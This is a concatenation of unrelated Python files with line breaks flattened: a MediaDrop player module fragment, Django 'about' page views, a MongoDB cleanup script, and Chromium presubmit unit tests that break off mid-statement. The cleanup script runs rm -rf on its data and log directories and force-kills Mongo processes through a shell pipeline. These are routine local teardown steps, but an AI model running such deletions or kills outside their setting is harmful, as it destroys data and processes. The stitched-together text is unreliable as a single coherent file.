UI.""" settings_form_class = player_forms.SublimePlayerPrefsForm """An optional :class:`mediadrop.forms.admin.players.PlayerPrefsForm`.""" default_data = {'script_tag': ''} """An optional default data dictionary for user preferences.""" supported_types = set([VIDEO]) """Sublime does not support AUDIO at this time.""" supports_resizing = False """A flag that allows us to mark the few players that can't be resized. Setting this to False ensures that the resize (expand/shrink) controls will not be shown in our player control bar. """ def html5_attrs(self): attrs = super(SublimePlayer, self).html5_attrs() attrs['class'] = (attrs.get('class', '') + ' sublime').strip() return attrs def render_js_player(self): return Markup('new mcore.SublimePlayer()') def render_markup(self, error_text=None): """Render the XHTML markup for this player instance. :param error_text: Optional error text that should be included in the final markup if appropriate for the player. :rtype: ``unicode`` or :class:`genshi.core.Markup` :returns: XHTML that will not be escaped by Genshi. """ video_tag = super(SublimePlayer, self).render_markup(error_text) return video_tag + Markup(self.data['script_tag']) AbstractHTML5Player.register(SublimePlayer) ############################################################################### class iTunesPlayer(FileSupportMixin, AbstractPlayer): """ A dummy iTunes Player that allows us to test if files :meth:`can_play`. """ name = u'itunes' """A unicode string identifier for this class.""" display_name = N_(u'iTunes Player') """A unicode display name for the class, to be used in the settings UI.""" supported_containers = set(['mp3', 'mp4']) supported_schemes = set([HTTP]) ############################################################################### def preferred_player_for_media(media, **kwargs): uris = media.get_uris() from mediadrop.model.players import fetch_enabled_players # Find the first player that can play any uris for player_cls, player_data in fetch_enabled_players(): can_play = player_cls.can_play(uris) if any(can_play): break else: return None # Grab just the uris that the chosen player can play playable_uris = [uri for uri, plays in izip(uris, can_play) if plays] kwargs['data'] = player_data return player_cls(media, playable_uris, **kwargs) def media_player(media, is_widescreen=False, show_like=True, show_dislike=True, show_download=False, show_embed=False, show_playerbar=True, show_popout=True, show_resize=False, show_share=True, js_init=None, **kwargs): """Instantiate and render the preferred player that can play this media. We make no effort to pick the "best" player here, we simply return the first player that *can* play any of the URIs associated with the given media object. It's up to the user to declare their own preferences wisely. Player preferences are fetched from the database and the :attr:`mediadrop.model.players.c.data` dict is passed as kwargs to :meth:`AbstractPlayer.__init__`. :type media: :class:`mediadrop.model.media.Media` :param media: A media instance to play. :param js_init: Optional function to call after the javascript player controller has been instantiated. Example of a function literal: ``function(controller){ controller.setFillScreen(true); }``. Any function reference can be used as long as it is defined in all pages and accepts the JS player controller as its first and only argument. :param \*\*kwargs: Extra kwargs for :meth:`AbstractPlayer.__init__`. :rtype: `str` or `None` :returns: A rendered player. """ player = preferred_player_for_media(media, **kwargs) return render('players/html5_or_flash.html', { 'player': player, 'media': media, 'uris': media.get_uris(), 'is_widescreen': is_widescreen, 'js_init': js_init, 'show_like': show_like, 'show_dislike': show_dislike, 'show_download': show_download, 'show_embed': show_embed, 'show_playerbar': show_playerbar, 'show_popout': show_popout, 'show_resize': show_resize and (player and player.supports_resizing), 'show_share': show_share, }) def pick_podcast_media_file(media): """Return a file playable in the most podcasting client: iTunes. :param media: A :class:`~mediadrop.model.media.Media` instance. :returns: A :class:`~mediadrop.model.media.MediaFile` object or None """ uris = media.get_uris() for i, plays in enumerate(iTunesPlayer.can_play(uris)): if plays: return uris[i] return None def pick_any_media_file(media): """Return a file playable in at least one of the configured players. :param media: A :class:`~mediadrop.model.media.Media` instance. :returns: A :class:`~mediadrop.model.media.MediaFile` object or None """ uris = media.get_uris() from mediadrop.model.players import fetch_enabled_players for player_cls, player_data in fetch_enabled_players(): for i, plays in enumerate(player_cls.can_play(uris)): if plays: return uris[i] return None def update_enabled_players(): """Ensure that the encoding status of all media is up to date with the new set of enabled players. The encoding status of Media objects is dependent on there being an enabled player that supports that format. Call this method after changing the set of enabled players, to ensure encoding statuses are up to date. """ from mediadrop.model import DBSession, Media media = DBSession.query(Media) for m in media: m.update_status() def embed_iframe(media, width=400, height=225, frameborder=0, **kwargs): """Return an <iframe> tag that loads our universal player. :type media: :class:`mediadrop.model.media.Media` :param media: The media object that is being rendered, to be passed to all instantiated player objects. :rtype: :class:`genshi.builder.Element` :returns: An iframe element stream. """ src = url_for(controller='/media', action='embed_player', slug=media.slug, qualified=True) tag = Element('iframe', src=src, width=width, height=height, frameborder=frameborder, **kwargs) # some software is known not to work with self-closing iframe tags # ('<iframe ... />'). Several WordPress instances are affected as well as # TWiki http://mediadrop.net/community/topic/embed-iframe-closing-tag tag.append('') return tag embed_player = embed_iframe
from datetime import datetime from django.http import Http404 from django.shortcuts import render # Create your views here. from api.models import Launch from app.models import Translator, Staff def translator_view(request, ): translators = Translator.objects.all() previous_launches = Launch.objects.filter(net__lte=datetime.now()).order_by('-net')[:5] return render(request, 'web/about/translators.html', {'translators': translators, 'previous_launches': previous_launches}) def staff_view(request, ): staff = Staff.objects.all() previous_launches = Launch.objects.filter(net__lte=datetime.now()).order_by('-net')[:5] return render(request, 'web/about/staff.html', {'staff': staff, 'previous_launches': previous_launches}) def about_view(request, ): previous_launches = Launch.objects.filter(net__lte=datetime.now()).order_by('-net')[:5] return render(request, 'web/about/about.html', {'previous_launches': previous_launches})
import subprocess import sys import os import time import inspect from os import path try: from pymongo import MongoClient as Connection except ImportError: from pymongo import Connection """ Global path variables """ PORTS_ONE = {"PRIMARY": "27117", "SECONDARY": "27118", "ARBITER": "27119", "CONFIG": "27220", "MONGOS": "27217"} PORTS_TWO = {"PRIMARY": "27317", "SECONDARY": "27318", "ARBITER": "27319", "CONFIG": "27220", "MONGOS": "27217"} CURRENT_DIR = inspect.getfile(inspect.currentframe()) CMD_DIR = os.path.realpath(os.path.abspath(os.path.split(CURRENT_DIR)[0])) SETUP_DIR = path.expanduser(CMD_DIR) DEMO_SERVER_DATA = SETUP_DIR + "/data" DEMO_SERVER_LOG = SETUP_DIR + "/logs" MONGOD_KSTR = " --dbpath " + DEMO_SERVER_DATA MONGOS_KSTR = "mongos --port " + PORTS_ONE["MONGOS"] def kill_mongo_proc(host, port): """ Kill given port """ try: conn = Connection(host, int(port)) conn['admin'].command('shutdown', 1, force=True) except: cmd = ["pgrep -f \"" + str(port) + MONGOD_KSTR + "\" | xargs kill -9"] execute_command(cmd) def kill_mongos_proc(): """ Kill all mongos proc """ cmd = ["pgrep -f \"" + MONGOS_KSTR + "\" | xargs kill -9"] execute_command(cmd) def kill_all_mongo_proc(host, ports): """Kill any existing mongods """ for port in ports.values(): kill_mongo_proc(host, port) def remove_dir(path): """Remove supplied directory """ command = ["rm", "-rf", path] subprocess.Popen(command).communicate() def execute_command(command): """Wait a little and then execute shell command """ time.sleep(1) #return os.system(command) subprocess.Popen(command, shell=True) if __name__ == "__main__": remove_dir(DEMO_SERVER_LOG) remove_dir(DEMO_SERVER_DATA) # Kill all spawned mongods kill_all_mongo_proc('localhost', PORTS_ONE) kill_all_mongo_proc('localhost', PORTS_TWO) # Kill all spawned mongos kill_mongos_proc()
#!/usr/bin/env python # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Unit tests for presubmit_support.py and presubmit_canned_checks.py.""" # pylint: disable=E1101,E1103 import StringIO import functools import itertools import logging import multiprocessing import os import sys import time import unittest _ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.insert(0, _ROOT) from testing_support.super_mox import mox, SuperMoxTestBase import owners import subprocess2 as subprocess import presubmit_support as presubmit import rietveld # Shortcut. presubmit_canned_checks = presubmit.presubmit_canned_checks # Access to a protected member XXX of a client class # pylint: disable=W0212 class PresubmitTestsBase(SuperMoxTestBase): """Setups and tear downs the mocks but doesn't test anything as-is.""" presubmit_text = """ def CheckChangeOnUpload(input_api, output_api): if not input_api.change.NOSUCHKEY: return [output_api.PresubmitError("!!")] elif not input_api.change.REALLYNOSUCHKEY: return [output_api.PresubmitPromptWarning("??")] elif not input_api.change.REALLYABSOLUTELYNOSUCHKEY: return [output_api.PresubmitPromptWarning("??"), output_api.PresubmitError("XX!!XX")] else: return () """ presubmit_tryslave = """ def GetPreferredTrySlaves(): return %s """ presubmit_tryslave_project = """ def GetPreferredTrySlaves(project): if project == %s: return %s else: return %s """ presubmit_trymaster = """ def GetPreferredTryMasters(project, change): return %s """ presubmit_diffs = """ --- file1 2011-02-09 10:38:16.517224845 -0800 +++ file2 2011-02-09 10:38:53.177226516 -0800 @@ -1,6 +1,5 @@ this is line number 0 this is line number 1 -this is line number 2 to be deleted this is line number 3 this is line number 4 this is line number 5 @@ -8,7 +7,7 @@ this is line number 7 this is line number 8 this is line number 9 -this is line number 10 to be modified +this is line number 10 this is line number 11 this is line number 12 this is line number 13 @@ -21,9 +20,8 @@ this is line number 20 this is line number 21 this is line number 22 -this is line number 23 -this is line number 24 -this is line number 25 +this is line number 23.1 +this is line number 25.1 this is line number 26 this is line number 27 this is line number 28 @@ -31,6 +29,7 @@ this is line number 30 this is line number 31 this is line number 32 +this is line number 32.1 this is line number 33 this is line number 34 this is line number 35 @@ -38,14 +37,14 @@ this is line number 37 this is line number 38 this is line number 39 - this is line number 40 -this is line number 41 +this is line number 41.1 this is line number 42 this is line number 43 this is line number 44 this is line number 45 + this is line number 46 this is line number 47 -this is line number 48 +this is line number 48.1 this is line number 49 """ def setUp(self): SuperMoxTestBase.setUp(self) class FakeChange(object): def __init__(self, obj): self._root = obj.fake_root_dir def RepositoryRoot(self): return self._root self.mox.StubOutWithMock(presubmit, 'random') self.mox.StubOutWithMock(presubmit, 'warn') presubmit._ASKED_FOR_FEEDBACK = False self.fake_root_dir = self.RootDir() self.fake_change = FakeChange(self) # Special mocks. def MockAbsPath(f): return f def MockChdir(f): return None # SuperMoxTestBase already mock these but simplify our life. presubmit.os.path.abspath = MockAbsPath presubmit.os.getcwd = self.RootDir presubmit.os.chdir = MockChdir self.mox.StubOutWithMock(presubmit.scm, 'determine_scm') self.mox.StubOutWithMock(presubmit.scm.SVN, '_CaptureInfo') self.mox.StubOutWithMock(presubmit.scm.SVN, 'GetFileProperty') self.mox.StubOutWithMock(presubmit.gclient_utils, 'FileRead') self.mox.StubOutWithMock(presubmit.gclient_utils, 'FileWrite') self.mox.StubOutWithMock(presubmit.scm.SVN, 'GenerateDiff') self.mox.StubOutWithMock(presubmit.scm.GIT, 'GenerateDiff') # On some platforms this does all sorts of undesirable system calls, so # just permanently mock it with a lambda that returns 2 multiprocessing.cpu_count = lambda: 2 class PresubmitUnittest(PresubmitTestsBase): """General presubmit_support.py tests (excluding InputApi and OutputApi).""" _INHERIT_SETTINGS = 'inherit-review-settings-ok' def testMembersChanged(self): self.mox.ReplayAll() members = [ 'AffectedFile', 'Change', 'DoGetTrySlaves', 'DoPostUploadExecuter', 'DoPresubmitChecks', 'GetPostUploadExecuter', 'GetTrySlavesExecuter', 'GitAffectedFile', 'CallCommand', 'CommandData', 'GitChange', 'InputApi', 'ListRelevantPresubmitFiles', 'main', 'NonexistantCannedCheckFilter', 'OutputApi', 'ParseFiles', 'PresubmitFailure', 'PresubmitExecuter', 'PresubmitOutput', 'ScanSubDirs', 'SvnAffectedFile', 'SvnChange', 'auth', 'cPickle', 'cpplint', 'cStringIO', 'contextlib', 'canned_check_filter', 'fix_encoding', 'fnmatch', 'gclient_utils', 'glob', 'inspect', 'json', 'load_files', 'logging', 'marshal', 'normpath', 'optparse', 'os', 'owners', 'pickle', 'presubmit_canned_checks', 'random', 're', 'rietveld', 'scm', 'subprocess', 'sys', 'tempfile', 'time', 'traceback', 'types', 'unittest', 'urllib2', 'warn', 'multiprocessing', 'DoGetTryMasters', 'GetTryMastersExecuter', 'itertools', ] # If this test fails, you should add the relevant test. self.compareMembers(presubmit, members) def testCannedCheckFilter(self): canned = presubmit.presubmit_canned_checks orig = canned.CheckOwners with presubmit.canned_check_filter(['CheckOwners']): self.assertNotEqual(canned.CheckOwners, orig) self.assertEqual(canned.CheckOwners(None, None), []) self.assertEqual(canned.CheckOwners, orig) def testCannedCheckFilterFail(self): canned = presubmit.presubmit_canned_checks orig = canned.CheckOwners def failAttempt(): with presubmit.canned_check_filter(['CheckOwners', 'Spazfleem']): pass self.assertRaises(presubmit.NonexistantCannedCheckFilter, failAttempt) self.assertEqual(canned.CheckOwners, orig) def testListRelevantPresubmitFiles(self): join = presubmit.os.path.join files = [ 'blat.cc', join('foo', 'haspresubmit', 'yodle', 'smart.h'), join('moo', 'mat', 'gat', 'yo.h'), join('foo', 'luck.h'), ] inherit_path = presubmit.os.path.join(self.fake_root_dir, self._INHERIT_SETTINGS) presubmit.os.path.isfile(inherit_path).AndReturn(False) presubmit.os.path.isfile(join(self.fake_root_dir, 'PRESUBMIT.py')).AndReturn(True) presubmit.os.path.isfile(join(self.fake_root_dir, 'foo', 'PRESUBMIT.py')).AndReturn(False) presubmit.os.path.isfile(join(self.fake_root_dir, 'foo', 'haspresubmit', 'PRESUBMIT.py')).AndReturn(True) presubmit.os.path.isfile(join(self.fake_root_dir, 'foo', 'haspresubmit', 'yodle', 'PRESUBMIT.py')).AndReturn(True) presubmit.os.path.isfile(join(self.fake_root_dir, 'moo', 'PRESUBMIT.py')).AndReturn(False) presubmit.os.path.isfile(join(self.fake_root_dir, 'moo', 'mat', 'PRESUBMIT.py')).AndReturn(False) presubmit.os.path.isfile(join(self.fake_root_dir, 'moo', 'mat', 'gat', 'PRESUBMIT.py')).AndReturn(False) self.mox.ReplayAll() presubmit_files = presubmit.ListRelevantPresubmitFiles(files, self.fake_root_dir) self.assertEqual(presubmit_files, [ join(self.fake_root_dir, 'PRESUBMIT.py'), join(self.fake_root_dir, 'foo', 'haspresubmit', 'PRESUBMIT.py'), join(self.fake_root_dir, 'foo', 'haspresubmit', 'yodle', 'PRESUBMIT.py') ]) def testListRelevantPresubmitFilesInheritSettings(self): join = presubmit.os.path.join sys_root_dir = self._OS_SEP root_dir = join(sys_root_dir, 'foo', 'bar') files = [ 'test.cc', join('moo', 'test2.cc'), join('zoo', 'test3.cc') ] inherit_path = presubmit.os.path.join(root_dir, self._INHERIT_SETTINGS) presubmit.os.path.isfile(inherit_path).AndReturn(True) presubmit.os.path.isfile(join(sys_root_dir, 'PRESUBMIT.py')).AndReturn(False) presubmit.os.path.isfile(join(sys_root_dir, 'foo', 'PRESUBMIT.py')).AndReturn(True) presubmit.os.path.isfile(join(sys_root_dir, 'foo', 'bar', 'PRESUBMIT.py')).AndReturn(False) presubmit.os.path.isfile(join(sys_root_dir, 'foo', 'bar', 'moo', 'PRESUBMIT.py')).AndReturn(True) presubmit.os.path.isfile(join(sys_root_dir, 'foo', 'bar', 'zoo', 'PRESUBMIT.py')).AndReturn(False) self.mox.ReplayAll() presubmit_files = presubmit.ListRelevantPresubmitFiles(files, root_dir) self.assertEqual(presubmit_files, [ join(sys_root_dir, 'foo', 'PRESUBMIT.py'), join(sys_root_dir, 'foo', 'bar', 'moo', 'PRESUBMIT.py') ]) def testTagLineRe(self): self.mox.ReplayAll() m = presubmit.Change.TAG_LINE_RE.match(' BUG =1223, 1445 \t') self.failUnless(m) self.failUnlessEqual(m.group('key'), 'BUG') self.failUnlessEqual(m.group('value'), '1223, 1445') def testGclChange(self): description_lines = ('Hello there', 'this is a change', 'BUG=123', ' STORY =http://foo/ \t', 'and some more regular text \t') files = [ ['A', 'foo/blat.cc'], ['M', 'binary.dll'], # a binary file ['A', 'isdir'], # a directory ['?', 'flop/notfound.txt'], # not found in SVN, still exists locally ['D', 'boo/flap.h'], ] blat = presubmit.os.path.join('foo', 'blat.cc') notfound = presubmit.os.path.join('flop', 'notfound.txt') flap = presubmit.os.path.join('boo', 'flap.h') binary = 'binary.dll' isdir = 'isdir' f_blat = presubmit.os.path.join(self.fake_root_dir, blat) f_notfound = presubmit.os.path.join(self.fake_root_dir, notfound) f_flap = presubmit.os.path.join(self.fake_root_dir, flap) f_binary = presubmit.os.path.join(self.fake_root_dir, binary) f_isdir = presubmit.os.path.join(self.fake_root_dir, isdir) presubmit.os.path.exists(f_blat).AndReturn(True) presubmit.os.path.isdir(f_blat).AndReturn(False) presubmit.os.path.exists(f_binary).AndReturn(True) presubmit.os.path.isdir(f_binary).AndReturn(False) presubmit.os.path.exists(f_isdir).AndReturn(True) presubmit.os.path.isdir(f_isdir).AndReturn(True) presubmit.os.path.exists(f_notfound).AndReturn(True) presubmit.os.path.isdir(f_notfound).AndReturn(False) presubmit.os.path.exists(f_flap).AndReturn(False) presubmit.scm.SVN._CaptureInfo([flap], self.fake_root_dir ).AndReturn({'Node Kind': 'file'}) presubmit.scm.SVN.GetFileProperty( blat, 'svn:mime-type', self.fake_root_dir).AndReturn(None) presubmit.scm.SVN.GetFileProperty( binary, 'svn:mime-type', self.fake_root_dir ).AndReturn('application/octet-stream') presubmit.scm.SVN.GetFileProperty( notfound, 'svn:mime-type', self.fake_root_dir).AndReturn('') presubmit.scm.SVN._CaptureInfo([blat], self.fake_root_dir).AndReturn( {'URL': 'svn:/foo/foo/blat.cc'}) presubmit.scm.SVN._CaptureInfo([binary], self.fake_root_dir).AndReturn( {'URL': 'svn:/foo/binary.dll'}) presubmit.scm.SVN._CaptureInfo([notfound], self.fake_root_dir).AndReturn({}) presubmit.scm.SVN._CaptureInfo([flap], self.fake_root_dir).AndReturn( {'URL': 'svn:/foo/boo/flap.h'}) presubmit.scm.SVN.GenerateDiff([blat], self.fake_root_dir, False, None ).AndReturn(self.presubmit_diffs) presubmit.scm.SVN.GenerateDiff([notfound], self.fake_root_dir, False, None ).AndReturn(self.presubmit_diffs) self.mox.ReplayAll() change = presubmit.SvnChange( 'mychange', '\n'.join(description_lines), self.fake_root_dir, files, 0, 0, None) self.failUnless(change.Name() == 'mychange') self.failUnless(change.DescriptionText() == 'Hello there\nthis is a change\nand some more regular text') self.failUnless(change.FullDescriptionText() == '\n'.join(description_lines)) self.failUnless(change.BUG == '123') self.failUnless(change.STORY == 'http://foo/') self.failUnless(change.BLEH == None) self.failUnless(len(change.AffectedFiles()) == 4) self.failUnless(len(change.AffectedFiles(include_dirs=True)) == 5) self.failUnless(len(change.AffectedFiles(include_deletes=False)) == 3) self.failUnless(len(change.AffectedFiles(include_dirs=True, include_deletes=False)) == 4) affected_text_files = change.AffectedTextFiles() self.failUnless(len(affected_text_files) == 2) self.failIf(filter(lambda x: x.LocalPath() == 'binary.dll', affected_text_files)) local_paths = change.LocalPaths() expected_paths = [presubmit.normpath(f[1]) for f in files] self.failUnless( len(filter(lambda x: x in expected_paths, local_paths)) == 4) server_paths = change.ServerPaths() expected_paths = ['svn:/foo/%s' % f[1] for f in files if f[1] != 'flop/notfound.txt'] expected_paths.append('') # one unknown file self.assertEqual( len(filter(lambda x: x in expected_paths, server_paths)), 4) files = [[x[0], presubmit.normpath(x[1])] for x in files] rhs_lines = [] for line in change.RightHandSideLines(): rhs_lines.append(line) self.assertEquals(rhs_lines[0][0].LocalPath(), files[0][1]) self.assertEquals(rhs_lines[0][1], 10) self.assertEquals(rhs_lines[0][2],'this is line number 10') self.assertEquals(rhs_lines[3][0].LocalPath(), files[0][1]) self.assertEquals(rhs_lines[3][1], 32) self.assertEquals(rhs_lines[3][2], 'this is line number 32.1') self.assertEquals(rhs_lines[8][0].LocalPath(), files[3][1]) self.assertEquals(rhs_lines[8][1], 23) self.assertEquals(rhs_lines[8][2], 'this is line number 23.1') self.assertEquals(rhs_lines[12][0].LocalPath(), files[3][1]) self.assertEquals(rhs_lines[12][1], 46) self.assertEquals(rhs_lines[12][2], '') self.assertEquals(rhs_lines[13][0].LocalPath(), files[3][1]) self.assertEquals(rhs_lines[13][1], 49) self.assertEquals(rhs_lines[13][2], 'this is line number 48.1') def testGitChange(self): description_lines = ('Hello there', 'this is a change', 'BUG=123', ' STORY =http://foo/ \t', 'and some more regular text \t') unified_diff = [ 'diff --git binary_a.png binary_a.png', 'new file mode 100644', 'index 0000000..6fbdd6d', 'Binary files /dev/null and binary_a.png differ', 'diff --git binary_d.png binary_d.png', 'deleted file mode 100644', 'index 6fbdd6d..0000000', 'Binary files binary_d.png and /dev/null differ', 'diff --git binary_md.png binary_md.png', 'index 6fbdd6..be3d5d8 100644', 'GIT binary patch', 'delta 109', 'zcmeyihjs5>)(Opwi4&WXB~yyi6N|G`(i5|?i<2_a@)OH5N{Um`D-<SM@g!_^W9;SR', 'zO9b*W5{pxTM0slZ=F42indK9U^MTyVQlJ2s%1BMmEKMv1Q^gtS&9nHn&*Ede;|~CU', 'CMJxLN', '', 'delta 34', 'scmV+-0Nww+y#@BX1(1W0gkzIp3}CZh0gVZ>`wGVcgW(Rh;SK@ZPa9GXlK=n!', '', 'diff --git binary_m.png binary_m.png', 'index 6fbdd6d..be3d5d8 100644', 'Binary files binary_m.png and binary_m.png differ', 'diff --git boo/blat.cc boo/blat.cc', 'new file mode 100644', 'index 0000000..37d18ad', '--- boo/blat.cc', '+++ boo/blat.cc', '@@ -0,0 +1,5 @@', '+This is some text', '+which lacks a copyright warning', '+but it is nonetheless interesting', '+and worthy of your attention.', '+Its freshness factor is through the roof.', 'diff --git floo/delburt.cc floo/delburt.cc', 'deleted file mode 100644', 'index e06377a..0000000', '--- floo/delburt.cc', '+++ /dev/null', '@@ -1,14 +0,0 @@', '-This text used to be here', '-but someone, probably you,', '-having consumed the text', '- (absorbed its meaning)', '-decided that it should be made to not exist', '-that others would not read it.', '- (What happened here?', '-was the author incompetent?', '-or is the world today so different from the world', '- the author foresaw', '-and past imaginination', '- amounts to rubble, insignificant,', '-something to be tripped over', '-and frustrated by)', 'diff --git foo/TestExpectations foo/TestExpectations', 'index c6e12ab..d1c5f23 100644', '--- foo/TestExpectations', '+++ foo/TestExpectations', '@@ -1,12 +1,24 @@', '-Stranger, behold:', '+Strange to behold:', ' This is a text', ' Its contents existed before.', '', '-It is written:', '+Weasel words suggest:', ' its contents shall exist after', ' and its contents', ' with the progress of time', ' will evolve,', '- snaillike,', '+ erratically,', ' into still different texts', '-from this.', '\ No newline at end of file', '+from this.', '+', '+For the most part,', '+I really think unified diffs', '+are elegant: the way you can type', '+diff --git inside/a/text inside/a/text', '+or something silly like', '+@@ -278,6 +278,10 @@', '+and have this not be interpreted', '+as the start of a new file', '+or anything messed up like that,', '+because you parsed the header', '+correctly.', '\ No newline at end of file', ''] files = [('A ', 'binary_a.png'), ('D ', 'binary_d.png'), ('M ', 'binary_m.png'), ('M ', 'binary_md.png'), # Binary w/ diff ('A ', 'boo/blat.cc'), ('D ', 'floo/delburt.cc'), ('M ', 'foo/TestExpectations')] for op, path in files: full_path = presubmit.os.path.join(self.fake_root_dir, *path.split('/')) if op.startswith('D'): os.path.exists(full_path).AndReturn(False) else: os.path.exists(full_path).AndReturn(False) os.path.isfile(full_path).AndReturn(True) presubmit.scm.GIT.GenerateDiff( self.fake_root_dir, files=[], full_move=True, branch=None ).AndReturn('\n'.join(unified_diff)) self.mox.ReplayAll() change = presubmit.GitChange( 'mychange', '\n'.join(description_lines), self.fake_root_dir, files, 0, 0, None, upstream=None) self.failUnless(change.Name() == 'mychange') self.failUnless(change.DescriptionText() == 'Hello there\nthis is a change\nand some more regular text') self.failUnless(change.FullDescriptionText() == '\n'.join(description_lines)) self.failUnless(change.BUG == '123') self.failUnless(change.STORY == 'http://foo/') self.failUnless(change.BLEH == None) self.failUnless(len(change.AffectedFiles()) == 7) self.failUnless(len(change.AffectedFiles(include_dirs=True)) == 7) self.failUnless(len(change.AffectedFiles(include_deletes=False)) == 5) self.failUnless(len(change.AffectedFiles(include_dirs=True, include_deletes=False)) == 5) # Note that on git, there's no distinction between binary files and text # files; everything that's not a delete is a text file. affected_text_files = change.AffectedTextFiles() self.failUnless(len(affected_text_files) == 5) local_paths = change.LocalPaths() expected_paths = [os.path.normpath(f) for op, f in files] self.assertEqual(local_paths, expected_paths) try: _ = change.ServerPaths() self.fail("ServerPaths implemented.") except NotImplementedError: pass actual_rhs_lines = [] for f, linenum, line in change.RightHandSideLines(): actual_rhs_lines.append((f.LocalPath(), linenum, line)) f_blat = os.path.normpath('boo/blat.cc') f_test_expectations = os.path.normpath('foo/TestExpectations') expected_rhs_lines = [ (f_blat, 1, 'This is some text'), (f_blat, 2, 'which lacks a copyright warning'), (f_blat, 3, 'but it is nonetheless interesting'), (f_blat, 4, 'and worthy of your attention.'), (f_blat, 5, 'Its freshness factor is through the roof.'), (f_test_expectations, 1, 'Strange to behold:'), (f_test_expectations, 5, 'Weasel words suggest:'), (f_test_expectations, 10, ' erratically,'), (f_test_expectations, 13, 'from this.'), (f_test_expectations, 14, ''), (f_test_expectations, 15, 'For the most part,'), (f_test_expectations, 16, 'I really think unified diffs'), (f_test_expectations, 17, 'are elegant: the way you can type'), (f_test_expectations, 18, 'diff --git inside/a/text inside/a/text'), (f_test_expectations, 19, 'or something silly like'), (f_test_expectations, 20, '@@ -278,6 +278,10 @@'), (f_test_expectations, 21, 'and have this not be interpreted'), (f_test_expectations, 22, 'as the start of a new file'), (f_test_expectations, 23, 'or anything messed up like that,'), (f_test_expectations, 24, 'because you parsed the header'), (f_test_expectations, 25, 'correctly.')] self.assertEquals(expected_rhs_lines, actual_rhs_lines) def testInvalidChange(self): try: presubmit.SvnChange( 'mychange', 'description', self.fake_root_dir, ['foo/blat.cc', 'bar'], 0, 0, None) self.fail() except AssertionError: pass def testExecPresubmitScript(self): description_lines = ('Hello there', 'this is a change', 'STORY=http://tracker/123') files = [ ['A', 'foo\\blat.cc'], ] fake_presubmit = presubmit.os.path.join(self.fake_root_dir, 'PRESUBMIT.py') self.mox.ReplayAll() change = presubmit.Change( 'mychange', '\n'.join(description_lines), self.fake_root_dir, files, 0, 0, None) executer = presubmit.PresubmitExecuter(change, False, None, False) self.failIf(executer.ExecPresubmitScript('', fake_presubmit)) # No error if no on-upload entry point self.failIf(executer.ExecPresubmitScript( ('def CheckChangeOnCommit(input_api, output_api):\n' ' return (output_api.PresubmitError("!!"))\n'), fake_presubmit )) executer = presubmit.PresubmitExecuter(change, True, None, False) # No error if no on-commit entry point self.failIf(executer.ExecPresubmitScript( ('def CheckChangeOnUpload(input_api, output_api):\n' ' return (output_api.PresubmitError("!!"))\n'), fake_presubmit )) self.failIf(executer.ExecPresubmitScript( ('def CheckChangeOnUpload(input_api, output_api):\n' ' if not input_api.change.STORY:\n' ' return (output_api.PresubmitError("!!"))\n' ' else:\n' ' return ()'), fake_presubmit )) self.failUnless(executer.ExecPresubmitScript( ('def CheckChangeOnCommit(input_api, output_api):\n' ' if not input_api.change.NOSUCHKEY:\n' ' return [output_api.PresubmitError("!!")]\n' ' else:\n' ' return ()'), fake_presubmit )) self.assertRaises(presubmit.PresubmitFailure, executer.ExecPresubmitScript, 'def CheckChangeOnCommit(input_api, output_api):\n' ' return "foo"', fake_presubmit) self.assertRaises(presubmit.PresubmitFailure, executer.ExecPresubmitScript, 'def CheckChangeOnCommit(input_api, output_api):\n' ' return ["foo"]', fake_presubmit) def testDoPresubmitChecks(self): join = presubmit.os.path.join description_lines = ('Hello there', 'this is a change', 'STORY=http://tracker/123') files = [ ['A', join('haspresubmit', 'blat.cc')], ] haspresubmit_path = join(self.fake_root_dir, 'haspresubmit', 'PRESUBMIT.py') root_path = join(self.fake_root_dir, 'PRESUBMIT.py') inherit_path = presubmit.os.path.join(self.fake_root_dir, self._INHERIT_SETTINGS) presubmit.os.path.isfile(inherit_path).AndReturn(False) presubmit.os.path.isfile(root_path).AndReturn(True) presubmit.os.path.isfile(haspresubmit_path).AndReturn(True) presubmit.gclient_utils.FileRead(root_path, 'rU').AndReturn(self.presubmit_text) presubmit.gclient_utils.FileRead(haspresubmit_path, 'rU').AndReturn(self.presubmit_text) presubmit.random.randint(0, 4).AndReturn(1) self.mox.ReplayAll() input_buf = StringIO.StringIO('y\n') change = presubmit.Change( 'mychange', '\n'.join(description_lines), self.fake_root_dir, files, 0, 0, None) output = presubmit.DoPresubmitChecks( change, False, True, None, input_buf, None, False, None) self.failIf(output.should_continue()) self.assertEqual(output.getvalue().count('!!'), 2) self.assertEqual(output.getvalue().count( 'Running presubmit upload checks ...\n'), 1) def testDoPresubmitChecksPromptsAfterWarnings(self): join = presubmit.os.path.join description_lines = ('Hello there', 'this is a change', 'NOSUCHKEY=http://tracker/123') files = [ ['A', join('haspresubmit', 'blat.cc')], ] presubmit_path = join(self.fake_root_dir, 'PRESUBMIT.py') haspresubmit_path = join(self.fake_root_dir, 'haspresubmit', 'PRESUBMIT.py') inherit_path = presubmit.os.path.join(self.fake_root_dir, self._INHERIT_SETTINGS) for _ in range(2): presubmit.os.path.isfile(inherit_path).AndReturn(False) presubmit.os.path.isfile(presubmit_path).AndReturn(True) presubmit.os.path.isfile(haspresubmit_path).AndReturn(True) presubmit.gclient_utils.FileRead(presubmit_path, 'rU' ).AndReturn(self.presubmit_text) presubmit.gclient_utils.FileRead(haspresubmit_path, 'rU' ).AndReturn(self.presubmit_text) presubmit.random.randint(0, 4).AndReturn(1) presubmit.random.randint(0, 4).AndReturn(1) self.mox.ReplayAll() input_buf = StringIO.StringIO('n\n') # say no to the warning change = presubmit.Change( 'mychange', '\n'.join(description_lines), self.fake_root_dir, files, 0, 0, None) output = presubmit.DoPresubmitChecks( change, False, True, None, input_buf, None, True, None) self.failIf(output.should_continue()) self.assertEqual(output.getvalue().count('??'), 2) input_buf = StringIO.StringIO('y\n') # say yes to the warning output = presubmit.DoPresubmitChecks( change, False, True, None, input_buf, None, True, None) self.failUnless(output.should_continue()) self.assertEquals(output.getvalue().count('??'), 2) self.assertEqual(output.getvalue().count( 'Running presubmit upload checks ...\n'), 1) def testDoPresubmitChecksNoWarningPromptIfErrors(self): join = presubmit.os.path.join description_lines = ('Hello there', 'this is a change', 'NOSUCHKEY=http://tracker/123', 'REALLYNOSUCHKEY=http://tracker/123') files = [ ['A', join('haspresubmit', 'blat.cc')], ] presubmit_path = join(self.fake_root_dir, 'PRESUBMIT.py') haspresubmit_path = 